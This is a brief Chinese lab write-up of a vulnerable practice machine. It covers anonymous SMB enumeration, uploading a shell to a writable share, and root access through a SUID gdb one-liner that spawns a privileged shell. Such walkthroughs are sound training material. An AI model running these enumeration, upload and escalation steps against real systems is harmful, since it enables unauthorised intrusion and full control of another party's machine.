Skip to main content

connection靶机---难度LOW-知识点-smb-enm4linux

·50 words·1 min
Smb
IIIIIIIIIIII
Author
IIIIIIIIIIII
A little bit about you
Table of Contents

connection靶机—难度LOW-知识点-smb-enm4linux
#

Nmap扫描发现
#

nmap
NMAP扫描

发现了经典的445

你可以

smbclient -L //172.20.10.2 -N 匿名访问查看分享内容

也可以

enum4linux 172.20.10.2 工具分析

发现了一个目录叫share进去可以上传文件我们上传一个php脚本或者shell

smbclient //172.20.10.2/share 直接登录回车

nmap
NMAP扫描

拿到shell权限
#

不知道为什么弹半天弹不上 用python可以弹上

nmap
NMAP扫描

拿root
#

上传扫描文件linepas 发现有一个suid权限的gdb

gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit

输入代码提权

nmap
NMAP扫描

总结一下
#

1:smb -L 查看分享的东西 -N 匿名

Related

baseme靶机---难度LOW-知识点-爆破ssh密钥-base64语法-
·95 words·1 min
Ssh2john Base64
大窑dayao靶机---难度LOW-知识点-tftp-udp-定时任务
·64 words·1 min
Creatab Tftp
VUlNyx-infected靶机---难度LOW-知识点-backdoor-module
·43 words·1 min
Module
Commit靶机---难度LOW-知识点-bash_history
·58 words·1 min
Bash_history SSH
Vulnyx-agent靶机-LOW-知识点-Agent-dirb工具
·66 words·1 min
Agent Dirb